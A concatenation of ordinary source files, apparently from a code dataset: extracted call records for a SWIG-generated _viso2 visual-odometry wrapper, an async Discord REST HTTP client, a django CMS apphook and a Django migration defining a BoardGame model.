21182), False, 'import _viso2\n'), ((21406, 21448), '_viso2.Matrix_getMat', '_viso2.Matrix_getMat', (['self', 'i1', 'j1', 'i2', 'j2'], {}), '(self, i1, j1, i2, j2)\n', (21426, 21448), False, 'import _viso2\n'), ((21533, 21568), '_viso2.Matrix_setMat', '_viso2.Matrix_setMat', (['self', 'M', 'i', 'j'], {}), '(self, M, i, j)\n', (21553, 21568), False, 'import _viso2\n'), ((21844, 21889), '_viso2.Matrix_setVal', '_viso2.Matrix_setVal', (['self', 's', 'i1', 'j1', 'i2', 'j2'], {}), '(self, s, i1, j1, i2, j2)\n', (21864, 21889), False, 'import _viso2\n'), ((22064, 22102), '_viso2.Matrix_setDiag', '_viso2.Matrix_setDiag', (['self', 's', 'i1', 'i2'], {}), '(self, s, i1, i2)\n', (22085, 22102), False, 'import _viso2\n'), ((22165, 22189), '_viso2.Matrix_zero', '_viso2.Matrix_zero', (['self'], {}), '(self)\n', (22183, 22189), False, 'import _viso2\n'), ((22286, 22322), '_viso2.Matrix_extractCols', '_viso2.Matrix_extractCols', (['self', 'idx'], {}), '(self, idx)\n', (22311, 22322), False, 'import _viso2\n'), ((22387, 22407), '_viso2.Matrix_eye', '_viso2.Matrix_eye', (['m'], {}), '(m)\n', (22404, 22407), False, 'import _viso2\n'), ((22506, 22534), '_viso2.Matrix_identity', '_viso2.Matrix_identity', (['self'], {}), '(self)\n', (22528, 22534), False, 'import _viso2\n'), ((22601, 22622), '_viso2.Matrix_diag', '_viso2.Matrix_diag', (['M'], {}), '(M)\n', (22619, 22622), False, 'import _viso2\n'), ((22737, 22767), '_viso2.Matrix_reshape', '_viso2.Matrix_reshape', (['M', 'm', 'n'], {}), '(M, m, n)\n', (22758, 22767), False, 'import _viso2\n'), ((22884, 22912), '_viso2.Matrix_rotMatX', '_viso2.Matrix_rotMatX', (['angle'], {}), '(angle)\n', (22905, 22912), False, 'import _viso2\n'), ((23029, 23057), '_viso2.Matrix_rotMatY', '_viso2.Matrix_rotMatY', (['angle'], {}), '(angle)\n', (23050, 23057), False, 'import _viso2\n'), ((23174, 23202), '_viso2.Matrix_rotMatZ', '_viso2.Matrix_rotMatZ', (['angle'], {}), '(angle)\n', (23195, 23202), False, 'import _viso2\n'), ((23323, 23353), '_viso2.Matrix___add__', '_viso2.Matrix___add__', (['self', 'M'], {}), '(self, M)\n', (23344, 23353), False, 'import _viso2\n'), ((23438, 23468), '_viso2.Matrix___sub__', '_viso2.Matrix___sub__', (['self', 'M'], {}), '(self, M)\n', (23459, 23468), False, 'import _viso2\n'), ((23610, 23644), '_viso2.Matrix___mul__', '_viso2.Matrix___mul__', (['self', '*args'], {}), '(self, *args)\n', (23631, 23644), False, 'import _viso2\n'), ((23696, 23734), '_viso2.Matrix___truediv__', '_viso2.Matrix___truediv__', (['self', '*args'], {}), '(self, *args)\n', (23721, 23734), False, 'import _viso2\n'), ((23840, 23867), '_viso2.Matrix___neg__', '_viso2.Matrix___neg__', (['self'], {}), '(self)\n', (23861, 23867), False, 'import _viso2\n'), ((23952, 23982), '_viso2.Matrix___invert__', '_viso2.Matrix___invert__', (['self'], {}), '(self)\n', (23976, 23982), False, 'import _viso2\n'), ((24058, 24084), '_viso2.Matrix_l2norm', '_viso2.Matrix_l2norm', (['self'], {}), '(self)\n', (24078, 24084), False, 'import _viso2\n'), ((24156, 24180), '_viso2.Matrix_mean', '_viso2.Matrix_mean', (['self'], {}), '(self)\n', (24174, 24180), False, 'import _viso2\n'), ((24255, 24280), '_viso2.Matrix_cross', '_viso2.Matrix_cross', (['a', 'b'], {}), '(a, b)\n', (24274, 24280), False, 'import _viso2\n'), ((24377, 24397), '_viso2.Matrix_inv', '_viso2.Matrix_inv', (['M'], {}), '(M)\n', (24394, 24397), False, 'import _viso2\n'), ((24508, 24538), '_viso2.Matrix_setInverse', '_viso2.Matrix_setInverse', (['self'], {}), '(self)\n', (24532, 24538), False, 'import _viso2\n'), ((24608, 24631), 
'_viso2.Matrix_det', '_viso2.Matrix_det', (['self'], {}), '(self)\n', (24625, 24631), False, 'import _viso2\n'), ((24781, 24814), '_viso2.Matrix_solve', '_viso2.Matrix_solve', (['self', 'M', 'eps'], {}), '(self, M, eps)\n', (24800, 24814), False, 'import _viso2\n'), ((24970, 25005), '_viso2.Matrix_lu', '_viso2.Matrix_lu', (['self', 'idx', 'd', 'eps'], {}), '(self, idx, d, eps)\n', (24986, 25005), False, 'import _viso2\n'), ((25084, 25116), '_viso2.Matrix_svd', '_viso2.Matrix_svd', (['self', 'U', 'W', 'V'], {}), '(self, U, W, V)\n', (25101, 25116), False, 'import _viso2\n'), ((25781, 25808), '_viso2.Matrix___str__', '_viso2.Matrix___str__', (['self'], {}), '(self)\n', (25802, 25808), False, 'import _viso2\n'), ((25887, 25919), '_viso2.Matrix_toNumpy', '_viso2.Matrix_toNumpy', (['self', 'mat'], {}), '(self, mat)\n', (25908, 25919), False, 'import _viso2\n'), ((27206, 27231), '_viso2.new_Matcher', '_viso2.new_Matcher', (['param'], {}), '(param)\n', (27224, 27231), False, 'import _viso2\n'), ((27537, 27588), '_viso2.Matcher_setIntrinsics', '_viso2.Matcher_setIntrinsics', (['self', 'f', 'cu', 'cv', 'base'], {}), '(self, f, cu, cv, base)\n', (27565, 27588), False, 'import _viso2\n'), ((27769, 27821), '_viso2.Matcher_matchFeatures', '_viso2.Matcher_matchFeatures', (['self', 'method', 'Tr_delta'], {}), '(self, method, Tr_delta)\n', (27797, 27821), False, 'import _viso2\n'), ((27990, 28068), '_viso2.Matcher_bucketFeatures', '_viso2.Matcher_bucketFeatures', (['self', 'max_features', 'bucket_width', 'bucket_height'], {}), '(self, max_features, bucket_width, bucket_height)\n', (28019, 28068), False, 'import _viso2\n'), ((28158, 28189), '_viso2.Matcher_getMatches', '_viso2.Matcher_getMatches', (['self'], {}), '(self)\n', (28183, 28189), False, 'import _viso2\n'), ((28285, 28322), '_viso2.Matcher_getGain', '_viso2.Matcher_getGain', (['self', 'inliers'], {}), '(self, inliers)\n', (28307, 28322), False, 'import _viso2\n'), ((28653, 28689), '_viso2.Matcher_pushBack', '_viso2.Matcher_pushBack', (['self', '*args'], {}), '(self, *args)\n', (28676, 28689), False, 'import _viso2\n'), ((33456, 33487), '_viso2.new_Matcher_parameters', '_viso2.new_Matcher_parameters', ([], {}), '()\n', (33485, 33487), False, 'import _viso2\n'), ((36814, 36839), '_viso2.new_p_match', '_viso2.new_p_match', (['*args'], {}), '(*args)\n', (36832, 36839), False, 'import _viso2\n'), ((37534, 37561), '_viso2.new_Reconstruction', '_viso2.new_Reconstruction', ([], {}), '()\n', (37559, 37561), False, 'import _viso2\n'), ((37864, 37917), '_viso2.Reconstruction_setCalibration', '_viso2.Reconstruction_setCalibration', (['self', 'f', 'cu', 'cv'], {}), '(self, f, cu, cv)\n', (37900, 37917), False, 'import _viso2\n'), ((38391, 38495), '_viso2.Reconstruction_update', '_viso2.Reconstruction_update', (['self', 'p_matched', 'Tr', 'point_type', 'min_track_length', 'max_dist', 'min_angle'], {}), '(self, p_matched, Tr, point_type,\n min_track_length, max_dist, min_angle)\n', (38419, 38495), False, 'import _viso2\n'), ((38581, 38618), '_viso2.Reconstruction_getPoints', '_viso2.Reconstruction_getPoints', (['self'], {}), '(self)\n', (38612, 38618), False, 'import _viso2\n'), ((38706, 38743), '_viso2.Reconstruction_getTracks', '_viso2.Reconstruction_getTracks', (['self'], {}), '(self)\n', (38737, 38743), False, 'import _viso2\n'), ((39903, 39928), '_viso2.new_point3d', '_viso2.new_point3d', (['*args'], {}), '(*args)\n', (39921, 39928), False, 'import _viso2\n'), ((41055, 41080), '_viso2.new_point2d', '_viso2.new_point2d', (['*args'], {}), '(*args)\n', 
(41073, 41080), False, 'import _viso2\n'), ((43108, 43126), '_viso2.new_track', '_viso2.new_track', ([], {}), '()\n', (43124, 43126), False, 'import _viso2\n'), ((43819, 43852), '_viso2.MatchVector_iterator', '_viso2.MatchVector_iterator', (['self'], {}), '(self)\n', (43846, 43852), False, 'import _viso2\n'), ((43992, 44028), '_viso2.MatchVector___nonzero__', '_viso2.MatchVector___nonzero__', (['self'], {}), '(self)\n', (44022, 44028), False, 'import _viso2\n'), ((44107, 44140), '_viso2.MatchVector___bool__', '_viso2.MatchVector___bool__', (['self'], {}), '(self)\n', (44134, 44140), False, 'import _viso2\n'), ((44255, 44287), '_viso2.MatchVector___len__', '_viso2.MatchVector___len__', (['self'], {}), '(self)\n', (44281, 44287), False, 'import _viso2\n'), ((44393, 44436), '_viso2.MatchVector___getslice__', '_viso2.MatchVector___getslice__', (['self', 'i', 'j'], {}), '(self, i, j)\n', (44424, 44436), False, 'import _viso2\n'), ((44582, 44626), '_viso2.MatchVector___setslice__', '_viso2.MatchVector___setslice__', (['self', '*args'], {}), '(self, *args)\n', (44613, 44626), False, 'import _viso2\n'), ((44717, 44760), '_viso2.MatchVector___delslice__', '_viso2.MatchVector___delslice__', (['self', 'i', 'j'], {}), '(self, i, j)\n', (44748, 44760), False, 'import _viso2\n'), ((44898, 44941), '_viso2.MatchVector___delitem__', '_viso2.MatchVector___delitem__', (['self', '*args'], {}), '(self, *args)\n', (44928, 44941), False, 'import _viso2\n'), ((45105, 45148), '_viso2.MatchVector___getitem__', '_viso2.MatchVector___getitem__', (['self', '*args'], {}), '(self, *args)\n', (45135, 45148), False, 'import _viso2\n'), ((45325, 45368), '_viso2.MatchVector___setitem__', '_viso2.MatchVector___setitem__', (['self', '*args'], {}), '(self, *args)\n', (45355, 45368), False, 'import _viso2\n'), ((45440, 45468), '_viso2.MatchVector_pop', '_viso2.MatchVector_pop', (['self'], {}), '(self)\n', (45462, 45468), False, 'import _viso2\n'), ((45541, 45575), '_viso2.MatchVector_append', '_viso2.MatchVector_append', (['self', 'x'], {}), '(self, x)\n', (45566, 45575), False, 'import _viso2\n'), ((45648, 45678), '_viso2.MatchVector_empty', '_viso2.MatchVector_empty', (['self'], {}), '(self)\n', (45672, 45678), False, 'import _viso2\n'), ((45787, 45816), '_viso2.MatchVector_size', '_viso2.MatchVector_size', (['self'], {}), '(self)\n', (45810, 45816), False, 'import _viso2\n'), ((45885, 45917), '_viso2.MatchVector_swap', '_viso2.MatchVector_swap', (['self', 'v'], {}), '(self, v)\n', (45908, 45917), False, 'import _viso2\n'), ((46027, 46057), '_viso2.MatchVector_begin', '_viso2.MatchVector_begin', (['self'], {}), '(self)\n', (46051, 46057), False, 'import _viso2\n'), ((46163, 46191), '_viso2.MatchVector_end', '_viso2.MatchVector_end', (['self'], {}), '(self)\n', (46185, 46191), False, 'import _viso2\n'), ((46311, 46342), '_viso2.MatchVector_rbegin', '_viso2.MatchVector_rbegin', (['self'], {}), '(self)\n', (46336, 46342), False, 'import _viso2\n'), ((46458, 46487), '_viso2.MatchVector_rend', '_viso2.MatchVector_rend', (['self'], {}), '(self)\n', (46481, 46487), False, 'import _viso2\n'), ((46552, 46582), '_viso2.MatchVector_clear', '_viso2.MatchVector_clear', (['self'], {}), '(self)\n', (46576, 46582), False, 'import _viso2\n'), ((46714, 46752), '_viso2.MatchVector_get_allocator', '_viso2.MatchVector_get_allocator', (['self'], {}), '(self)\n', (46746, 46752), False, 'import _viso2\n'), ((46823, 46856), '_viso2.MatchVector_pop_back', '_viso2.MatchVector_pop_back', (['self'], {}), '(self)\n', (46850, 46856), False, 'import 
_viso2\n'), ((47074, 47111), '_viso2.MatchVector_erase', '_viso2.MatchVector_erase', (['self', '*args'], {}), '(self, *args)\n', (47098, 47111), False, 'import _viso2\n'), ((47361, 47390), '_viso2.new_MatchVector', '_viso2.new_MatchVector', (['*args'], {}), '(*args)\n', (47383, 47390), False, 'import _viso2\n'), ((47583, 47620), '_viso2.MatchVector_push_back', '_viso2.MatchVector_push_back', (['self', 'x'], {}), '(self, x)\n', (47611, 47620), False, 'import _viso2\n'), ((47696, 47726), '_viso2.MatchVector_front', '_viso2.MatchVector_front', (['self'], {}), '(self)\n', (47720, 47726), False, 'import _viso2\n'), ((47800, 47829), '_viso2.MatchVector_back', '_viso2.MatchVector_back', (['self'], {}), '(self)\n', (47823, 47829), False, 'import _viso2\n'), ((47908, 47945), '_viso2.MatchVector_assign', '_viso2.MatchVector_assign', (['self', 'n', 'x'], {}), '(self, n, x)\n', (47933, 47945), False, 'import _viso2\n'), ((48081, 48119), '_viso2.MatchVector_resize', '_viso2.MatchVector_resize', (['self', '*args'], {}), '(self, *args)\n', (48106, 48119), False, 'import _viso2\n'), ((48296, 48334), '_viso2.MatchVector_insert', '_viso2.MatchVector_insert', (['self', '*args'], {}), '(self, *args)\n', (48321, 48334), False, 'import _viso2\n'), ((48409, 48444), '_viso2.MatchVector_reserve', '_viso2.MatchVector_reserve', (['self', 'n'], {}), '(self, n)\n', (48435, 48444), False, 'import _viso2\n'), ((48561, 48594), '_viso2.MatchVector_capacity', '_viso2.MatchVector_capacity', (['self'], {}), '(self)\n', (48588, 48594), False, 'import _viso2\n'), ((49216, 49251), '_viso2.Point3dVector_iterator', '_viso2.Point3dVector_iterator', (['self'], {}), '(self)\n', (49245, 49251), False, 'import _viso2\n'), ((49391, 49429), '_viso2.Point3dVector___nonzero__', '_viso2.Point3dVector___nonzero__', (['self'], {}), '(self)\n', (49423, 49429), False, 'import _viso2\n'), ((49508, 49543), '_viso2.Point3dVector___bool__', '_viso2.Point3dVector___bool__', (['self'], {}), '(self)\n', (49537, 49543), False, 'import _viso2\n'), ((49665, 49699), '_viso2.Point3dVector___len__', '_viso2.Point3dVector___len__', (['self'], {}), '(self)\n', (49693, 49699), False, 'import _viso2\n'), ((49807, 49852), '_viso2.Point3dVector___getslice__', '_viso2.Point3dVector___getslice__', (['self', 'i', 'j'], {}), '(self, i, j)\n', (49840, 49852), False, 'import _viso2\n'), ((49998, 50044), '_viso2.Point3dVector___setslice__', '_viso2.Point3dVector___setslice__', (['self', '*args'], {}), '(self, *args)\n', (50031, 50044), False, 'import _viso2\n'), ((50135, 50180), '_viso2.Point3dVector___delslice__', '_viso2.Point3dVector___delslice__', (['self', 'i', 'j'], {}), '(self, i, j)\n', (50168, 50180), False, 'import _viso2\n'), ((50318, 50363), '_viso2.Point3dVector___delitem__', '_viso2.Point3dVector___delitem__', (['self', '*args'], {}), '(self, *args)\n', (50350, 50363), False, 'import _viso2\n'), ((50529, 50574), '_viso2.Point3dVector___getitem__', '_viso2.Point3dVector___getitem__', (['self', '*args'], {}), '(self, *args)\n', (50561, 50574), False, 'import _viso2\n'), ((50751, 50796), '_viso2.Point3dVector___setitem__', '_viso2.Point3dVector___setitem__', (['self', '*args'], {}), '(self, *args)\n', (50783, 50796), False, 'import _viso2\n'), ((50868, 50898), '_viso2.Point3dVector_pop', '_viso2.Point3dVector_pop', (['self'], {}), '(self)\n', (50892, 50898), False, 'import _viso2\n'), ((50971, 51007), '_viso2.Point3dVector_append', '_viso2.Point3dVector_append', (['self', 'x'], {}), '(self, x)\n', (50998, 51007), False, 'import _viso2\n'), ((51080, 51112), 
'_viso2.Point3dVector_empty', '_viso2.Point3dVector_empty', (['self'], {}), '(self)\n', (51106, 51112), False, 'import _viso2\n'), ((51228, 51259), '_viso2.Point3dVector_size', '_viso2.Point3dVector_size', (['self'], {}), '(self)\n', (51253, 51259), False, 'import _viso2\n'), ((51328, 51362), '_viso2.Point3dVector_swap', '_viso2.Point3dVector_swap', (['self', 'v'], {}), '(self, v)\n', (51353, 51362), False, 'import _viso2\n'), ((51479, 51511), '_viso2.Point3dVector_begin', '_viso2.Point3dVector_begin', (['self'], {}), '(self)\n', (51505, 51511), False, 'import _viso2\n'), ((51624, 51654), '_viso2.Point3dVector_end', '_viso2.Point3dVector_end', (['self'], {}), '(self)\n', (51648, 51654), False, 'import _viso2\n'), ((51781, 51814), '_viso2.Point3dVector_rbegin', '_viso2.Point3dVector_rbegin', (['self'], {}), '(self)\n', (51808, 51814), False, 'import _viso2\n'), ((51937, 51968), '_viso2.Point3dVector_rend', '_viso2.Point3dVector_rend', (['self'], {}), '(self)\n', (51962, 51968), False, 'import _viso2\n'), ((52033, 52065), '_viso2.Point3dVector_clear', '_viso2.Point3dVector_clear', (['self'], {}), '(self)\n', (52059, 52065), False, 'import _viso2\n'), ((52204, 52244), '_viso2.Point3dVector_get_allocator', '_viso2.Point3dVector_get_allocator', (['self'], {}), '(self)\n', (52238, 52244), False, 'import _viso2\n'), ((52315, 52350), '_viso2.Point3dVector_pop_back', '_viso2.Point3dVector_pop_back', (['self'], {}), '(self)\n', (52344, 52350), False, 'import _viso2\n'), ((52582, 52621), '_viso2.Point3dVector_erase', '_viso2.Point3dVector_erase', (['self', '*args'], {}), '(self, *args)\n', (52608, 52621), False, 'import _viso2\n'), ((52879, 52910), '_viso2.new_Point3dVector', '_viso2.new_Point3dVector', (['*args'], {}), '(*args)\n', (52903, 52910), False, 'import _viso2\n'), ((53103, 53142), '_viso2.Point3dVector_push_back', '_viso2.Point3dVector_push_back', (['self', 'x'], {}), '(self, x)\n', (53133, 53142), False, 'import _viso2\n'), ((53218, 53250), '_viso2.Point3dVector_front', '_viso2.Point3dVector_front', (['self'], {}), '(self)\n', (53244, 53250), False, 'import _viso2\n'), ((53324, 53355), '_viso2.Point3dVector_back', '_viso2.Point3dVector_back', (['self'], {}), '(self)\n', (53349, 53355), False, 'import _viso2\n'), ((53434, 53473), '_viso2.Point3dVector_assign', '_viso2.Point3dVector_assign', (['self', 'n', 'x'], {}), '(self, n, x)\n', (53461, 53473), False, 'import _viso2\n'), ((53609, 53649), '_viso2.Point3dVector_resize', '_viso2.Point3dVector_resize', (['self', '*args'], {}), '(self, *args)\n', (53636, 53649), False, 'import _viso2\n'), ((53833, 53873), '_viso2.Point3dVector_insert', '_viso2.Point3dVector_insert', (['self', '*args'], {}), '(self, *args)\n', (53860, 53873), False, 'import _viso2\n'), ((53948, 53985), '_viso2.Point3dVector_reserve', '_viso2.Point3dVector_reserve', (['self', 'n'], {}), '(self, n)\n', (53976, 53985), False, 'import _viso2\n'), ((54109, 54144), '_viso2.Point3dVector_capacity', '_viso2.Point3dVector_capacity', (['self'], {}), '(self)\n', (54138, 54144), False, 'import _viso2\n'), ((54768, 54801), '_viso2.TrackVector_iterator', '_viso2.TrackVector_iterator', (['self'], {}), '(self)\n', (54795, 54801), False, 'import _viso2\n'), ((54941, 54977), '_viso2.TrackVector___nonzero__', '_viso2.TrackVector___nonzero__', (['self'], {}), '(self)\n', (54971, 54977), False, 'import _viso2\n'), ((55056, 55089), '_viso2.TrackVector___bool__', '_viso2.TrackVector___bool__', (['self'], {}), '(self)\n', (55083, 55089), False, 'import _viso2\n'), ((55209, 55241), 
'_viso2.TrackVector___len__', '_viso2.TrackVector___len__', (['self'], {}), '(self)\n', (55235, 55241), False, 'import _viso2\n'), ((55347, 55390), '_viso2.TrackVector___getslice__', '_viso2.TrackVector___getslice__', (['self', 'i', 'j'], {}), '(self, i, j)\n', (55378, 55390), False, 'import _viso2\n'), ((55536, 55580), '_viso2.TrackVector___setslice__', '_viso2.TrackVector___setslice__', (['self', '*args'], {}), '(self, *args)\n', (55567, 55580), False, 'import _viso2\n'), ((55671, 55714), '_viso2.TrackVector___delslice__', '_viso2.TrackVector___delslice__', (['self', 'i', 'j'], {}), '(self, i, j)\n', (55702, 55714), False, 'import _viso2\n'), ((55852, 55895), '_viso2.TrackVector___delitem__', '_viso2.TrackVector___delitem__', (['self', '*args'], {}), '(self, *args)\n', (55882, 55895), False, 'import _viso2\n'), ((56057, 56100), '_viso2.TrackVector___getitem__', '_viso2.TrackVector___getitem__', (['self', '*args'], {}), '(self, *args)\n', (56087, 56100), False, 'import _viso2\n'), ((56277, 56320), '_viso2.TrackVector___setitem__', '_viso2.TrackVector___setitem__', (['self', '*args'], {}), '(self, *args)\n', (56307, 56320), False, 'import _viso2\n'), ((56390, 56418), '_viso2.TrackVector_pop', '_viso2.TrackVector_pop', (['self'], {}), '(self)\n', (56412, 56418), False, 'import _viso2\n'), ((56491, 56525), '_viso2.TrackVector_append', '_viso2.TrackVector_append', (['self', 'x'], {}), '(self, x)\n', (56516, 56525), False, 'import _viso2\n'), ((56598, 56628), '_viso2.TrackVector_empty', '_viso2.TrackVector_empty', (['self'], {}), '(self)\n', (56622, 56628), False, 'import _viso2\n'), ((56742, 56771), '_viso2.TrackVector_size', '_viso2.TrackVector_size', (['self'], {}), '(self)\n', (56765, 56771), False, 'import _viso2\n'), ((56840, 56872), '_viso2.TrackVector_swap', '_viso2.TrackVector_swap', (['self', 'v'], {}), '(self, v)\n', (56863, 56872), False, 'import _viso2\n'), ((56987, 57017), '_viso2.TrackVector_begin', '_viso2.TrackVector_begin', (['self'], {}), '(self)\n', (57011, 57017), False, 'import _viso2\n'), ((57128, 57156), '_viso2.TrackVector_end', '_viso2.TrackVector_end', (['self'], {}), '(self)\n', (57150, 57156), False, 'import _viso2\n'), ((57281, 57312), '_viso2.TrackVector_rbegin', '_viso2.TrackVector_rbegin', (['self'], {}), '(self)\n', (57306, 57312), False, 'import _viso2\n'), ((57433, 57462), '_viso2.TrackVector_rend', '_viso2.TrackVector_rend', (['self'], {}), '(self)\n', (57456, 57462), False, 'import _viso2\n'), ((57527, 57557), '_viso2.TrackVector_clear', '_viso2.TrackVector_clear', (['self'], {}), '(self)\n', (57551, 57557), False, 'import _viso2\n'), ((57694, 57732), '_viso2.TrackVector_get_allocator', '_viso2.TrackVector_get_allocator', (['self'], {}), '(self)\n', (57726, 57732), False, 'import _viso2\n'), ((57803, 57836), '_viso2.TrackVector_pop_back', '_viso2.TrackVector_pop_back', (['self'], {}), '(self)\n', (57830, 57836), False, 'import _viso2\n'), ((58064, 58101), '_viso2.TrackVector_erase', '_viso2.TrackVector_erase', (['self', '*args'], {}), '(self, *args)\n', (58088, 58101), False, 'import _viso2\n'), ((58351, 58380), '_viso2.new_TrackVector', '_viso2.new_TrackVector', (['*args'], {}), '(*args)\n', (58373, 58380), False, 'import _viso2\n'), ((58573, 58610), '_viso2.TrackVector_push_back', '_viso2.TrackVector_push_back', (['self', 'x'], {}), '(self, x)\n', (58601, 58610), False, 'import _viso2\n'), ((58684, 58714), '_viso2.TrackVector_front', '_viso2.TrackVector_front', (['self'], {}), '(self)\n', (58708, 58714), False, 'import _viso2\n'), ((58786, 58815), 
'_viso2.TrackVector_back', '_viso2.TrackVector_back', (['self'], {}), '(self)\n', (58809, 58815), False, 'import _viso2\n'), ((58894, 58931), '_viso2.TrackVector_assign', '_viso2.TrackVector_assign', (['self', 'n', 'x'], {}), '(self, n, x)\n', (58919, 58931), False, 'import _viso2\n'), ((59067, 59105), '_viso2.TrackVector_resize', '_viso2.TrackVector_resize', (['self', '*args'], {}), '(self, *args)\n', (59092, 59105), False, 'import _viso2\n'), ((59287, 59325), '_viso2.TrackVector_insert', '_viso2.TrackVector_insert', (['self', '*args'], {}), '(self, *args)\n', (59312, 59325), False, 'import _viso2\n'), ((59400, 59435), '_viso2.TrackVector_reserve', '_viso2.TrackVector_reserve', (['self', 'n'], {}), '(self, n)\n', (59426, 59435), False, 'import _viso2\n'), ((59557, 59590), '_viso2.TrackVector_capacity', '_viso2.TrackVector_capacity', (['self'], {}), '(self)\n', (59584, 59590), False, 'import _viso2\n'), ((488, 518), 'importlib.import_module', 'importlib.import_module', (['mname'], {}), '(mname)\n', (511, 518), False, 'import importlib\n'), ((566, 599), 'importlib.import_module', 'importlib.import_module', (['"""_viso2"""'], {}), "('_viso2')\n", (589, 599), False, 'import importlib\n'), ((1021, 1073), 'imp.load_module', 'imp.load_module', (['"""_viso2"""', 'fp', 'pathname', 'description'], {}), "('_viso2', fp, pathname, description)\n", (1036, 1073), False, 'import imp\n'), ((889, 906), 'os.path.dirname', 'dirname', (['__file__'], {}), '(__file__)\n', (896, 906), False, 'from os.path import dirname\n')] |
# -*- coding: utf-8 -*-
import asyncio
import datetime
import json
import logging
import sys
from typing import Optional
import aiohttp
from aiohttp import ClientSession
from . import __version__
from .errors import (
BadGateway,
BadRequest,
Forbidden,
HTTPException,
InternalServerError,
NotFound,
RateLimited
)
__log__ = logging.getLogger(__name__)
__all__ = (
'Route',
'HTTPClient'
)
class Route:
BASE = 'https://discord.com/api'
def __init__(self, method, path):
self.path = path
self.method = method
self.url = (self.BASE + self.path)
class HTTPClient:
__slots__ = ('token', 'loop', 'proxy', 'proxy_auth', '__session', '__agent')
def __init__(self, token: str, loop=None, proxy=None, proxy_auth=None, session: Optional[ClientSession] = None) -> None:
self.token = token
self.loop = asyncio.get_event_loop() if loop is None else loop
self.proxy = proxy
self.proxy_auth = proxy_auth
self.__session = session
self.__agent = f'RestCord.py (https://github.com/Yandawl/restcord.py {__version__}) Python/{sys.version_info[0]}.{sys.version_info[1]} aiohttp/{aiohttp.__version__}'
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc, tb):
await self.close()
@property
def session(self) -> ClientSession:
""":class:`ClientSession`: The aiohttp ClientSession."""
if self.__session is None or self.__session.closed:
self.__session = ClientSession()
return self.__session
async def close(self):
if self.__session:
await self.__session.close()
async def _request(self, route: Route, **kwargs):
method = route.method
url = route.url
kwargs['headers'] = {
'User-Agent': self.__agent,
'X-Ratelimit-Precision': 'millisecond',
'Authorization': f'Bot {self.token}'
}
if 'json' in kwargs:
kwargs['headers']['Content-Type'] = 'application/json'
kwargs['data'] = self.__to_json(kwargs.pop('json'))
if self.proxy is not None:
kwargs['proxy'] = self.proxy
if self.proxy_auth is not None:
kwargs['proxy_auth'] = self.proxy_auth
async with self.session.request(method, url, **kwargs) as r:
__log__.debug(f'{method} {url} with {kwargs.get("data")} has returned {r.status}')
data = await self.__get_data(r)
remaining = r.headers.get('X-Ratelimit-Remaining')
if remaining == '0' and r.status != 429:
__log__.debug(f'A rate limit bucket has been exhausted (retry: {self.__parse_ratelimit_header(r)}).')
if 300 > r.status >= 200:
__log__.debug(f'{method} {url} has received {data}')
return data
if r.status == 429:
raise RateLimited(r, data)
if r.status == 400:
raise BadRequest(r, data)
if r.status == 403:
raise Forbidden(r, data)
if r.status == 404:
raise NotFound(r, data)
if r.status == 500:
raise InternalServerError(r, data)
if r.status == 502:
raise BadGateway(r, data)
raise HTTPException(r, data)
async def __get_data(self, response):
text = await response.text(encoding='utf-8')
try:
if response.headers['content-type'] == 'application/json':
return json.loads(text)
except KeyError:
pass
return text
def __parse_ratelimit_header(self, request, *, use_clock=False):
reset_after = request.headers.get('X-Ratelimit-Reset-After')
if use_clock or not reset_after:
utc = datetime.timezone.utc
now = datetime.datetime.now(utc)
reset = datetime.datetime.fromtimestamp(float(request.headers['X-Ratelimit-Reset']), utc)
return (reset - now).total_seconds()
else:
return float(reset_after)
def __to_json(self, obj):
return json.dumps(obj, separators=(',', ':'), ensure_ascii=True)
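# ---------------------------------------------------------------------------
# Minimal usage sketch (illustration only): HTTPClient is intended to be used
# as an async context manager. The token and the '/gateway' route below are
# placeholders, and _request is called directly purely for demonstration.
# ---------------------------------------------------------------------------
async def _example():
    async with HTTPClient(token="bot-token-here") as http:
        gateway = await http._request(Route('GET', '/gateway'))
        print(gateway)

# To run the sketch: asyncio.run(_example())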
| [
"logging.getLogger",
"aiohttp.ClientSession",
"json.loads",
"json.dumps",
"datetime.datetime.now",
"asyncio.get_event_loop"
]
| [((354, 381), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (371, 381), False, 'import logging\n'), ((4193, 4250), 'json.dumps', 'json.dumps', (['obj'], {'separators': "(',', ':')", 'ensure_ascii': '(True)'}), "(obj, separators=(',', ':'), ensure_ascii=True)\n", (4203, 4250), False, 'import json\n'), ((891, 915), 'asyncio.get_event_loop', 'asyncio.get_event_loop', ([], {}), '()\n', (913, 915), False, 'import asyncio\n'), ((1553, 1568), 'aiohttp.ClientSession', 'ClientSession', ([], {}), '()\n', (1566, 1568), False, 'from aiohttp import ClientSession\n'), ((3917, 3943), 'datetime.datetime.now', 'datetime.datetime.now', (['utc'], {}), '(utc)\n', (3938, 3943), False, 'import datetime\n'), ((3599, 3615), 'json.loads', 'json.loads', (['text'], {}), '(text)\n', (3609, 3615), False, 'import json\n')] |
from cms.app_base import CMSApp
from cms.apphook_pool import apphook_pool
from django.utils.translation import gettext as _
class CategoriesAppHook(CMSApp):
name = _("Categories")
def get_urls(self, page=None, language=None, **kwargs):
return ["apps.articles.urls"]
apphook_pool.register(CategoriesAppHook)
| [
"cms.apphook_pool.apphook_pool.register",
"django.utils.translation.gettext"
]
| [((287, 327), 'cms.apphook_pool.apphook_pool.register', 'apphook_pool.register', (['CategoriesAppHook'], {}), '(CategoriesAppHook)\n', (308, 327), False, 'from cms.apphook_pool import apphook_pool\n'), ((170, 185), 'django.utils.translation.gettext', '_', (['"""Categories"""'], {}), "('Categories')\n", (171, 185), True, 'from django.utils.translation import gettext as _\n')] |
# Generated by Django 3.1 on 2020-08-22 17:48
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='BoardGame',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=50)),
                ('edition_year', models.IntegerField()),
('designer', models.CharField(max_length=30)),
('game_duration_min', models.IntegerField()),
('player_number', models.IntegerField()),
('rating', models.IntegerField(choices=[(1, 'Very bad'), (2, 'Bad'), (3, 'Regular'), (4, 'Good'), (5, 'Very good')])),
('played', models.BooleanField()),
('acquisition_date', models.DateField()),
],
),
]
| [
"django.db.models.DateField",
"django.db.models.IntegerField",
"django.db.models.BooleanField",
"django.db.models.AutoField",
"django.db.models.CharField"
]
